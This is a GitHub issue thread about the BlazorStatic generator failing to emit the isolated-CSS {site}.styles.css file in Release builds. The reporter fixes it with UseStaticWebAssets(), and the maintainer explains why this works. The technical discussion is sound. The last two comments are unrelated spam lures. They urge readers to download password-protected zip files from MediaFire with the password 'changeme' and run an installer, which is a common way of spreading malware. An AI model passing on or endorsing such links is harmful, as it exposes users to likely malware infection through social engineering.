### ISSUE TITLE
site.styles.css

### ISSUE THREAD

**Issue by kijanawoodard** [tesar-tech/BlazorStatic#26]
Hi. Great project!

When I use the shutdown app option (code below), the {site}.styles.css file doesn't get generated. These contain all the styles done with css isolation on individual components. Consequently, the app isn't styled correctly.

Is there a workaround?

At the moment, I'm running in Development on my local, committing the output folder to the repo and serving from there on cloudflare. 

My goal is to `dotnet run` on cloudflare and avoid committing those files. My main motivation for changing is because sometimes when I'm doing development under `dotnet watch`, not all the files get copied to `output` unless I explicitly restart the app. I don't notice the file are missing until the site is live and I'm testing it out. I'd like to remove this failure mode, especially if other people contribute to the site.

I'm able to repro this locally. I can run normally under development and the log shows the {site}.style.css is emitted. If I run under the Release profile, as shown in the docs, then the {site}.style.css is missing.

`app.UseBlazorStaticGenerator(shutdownApp: !app.Environment.IsDevelopment());`

**Comment by kijanawoodard** [comment]
Well. After typing this out, I got some more ideas. I discovered that this is a known, umm, aspect of Release/Production.

tl;dr I fixed the issue by adding the following code.
```
if (builder.Environment.IsProduction())
{
    builder.WebHost.UseStaticWebAssets();
}
```

source: https://learn.microsoft.com/en-us/aspnet/core/blazor/fundamentals/static-files?view=aspnetcore-8.0#static-files-in-non-development-environments

**Comment by tesar-tech** [comment]
Hey,
That's an interesting issue. Thanks for reporting.
I haven't worked with the css isolation, since with tailwind it is not needed.
That's the reason why it slip through my radar. 

First -> When you run the app in dotnet watch it doesn't reflect the changes, mostly because it loads the md files and then it's done with that and keeps them in the memory (as `Post`) for the app life... It doesn't "rebuild" the post list on a file change. That would be a nice feature to have for sure...

Second -> When researching, I received your second comment.. Ok, I think what's going on kind of.. StaticWebAssets are "symbolic" links, that are perceived like they are in wwwroot when the app is running. For example this is also for files starting with ` _framework`  or ` _content` . When building the app for production, the web assets are actually copied to the wwwroot folder... Now - why tf isn't the style.css copied too??

Maybe the answer is [here](https://learn.microsoft.com/en-us/aspnet/core/blazor/components/css-isolation?view=aspnetcore-8.0#disable-automatic-bundling) 

>  Blazor publishes and loads scoped files at runtime

Which means the wwwroot is copied before the style.css is created.. But the runtime "wording" contradicts the same article in [different section](https://learn.microsoft.com/en-us/aspnet/core/blazor/components/css-isolation?view=aspnetcore-8.0#css-isolation-bundling).

> CSS isolation occurs at build time

So I am bit confused..

I think workaround can be to turn off the ` <DisableScopedCssBundling>true</DisableScopedCssBundling>`  and pickup the isolated css from `obj` folder... 

But there should be something easier... 
The webassets on production are also a good workaround, but since they strongly recommend to not doing it on production, I would like to find a different solution..

Will get back to it later... 

Please report back if you have more thoughts about the issue.

**Comment by tesar-tech** [comment]
Well,.. You have found a solution with `builder.WebHost.UseStaticWebAssets();`, which is exactly what I [use](https://github.com/tesar-tech/BlazorStatic/blob/master/BlazorStaticWebsite/Program.cs) and [recommend](https://tesar-tech.github.io/BlazorStatic/blog/release-1.0.0-beta.4) to do, even mentioning isolated css and explain why that's not a problem...cool.

I need to bring this to docs. Any idea, what is the best place? I kind of make the docs by publishing a blogpost about new features, but it's not a proper documentation...

btw, maybe the best solution would be to publish the app before running it..

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
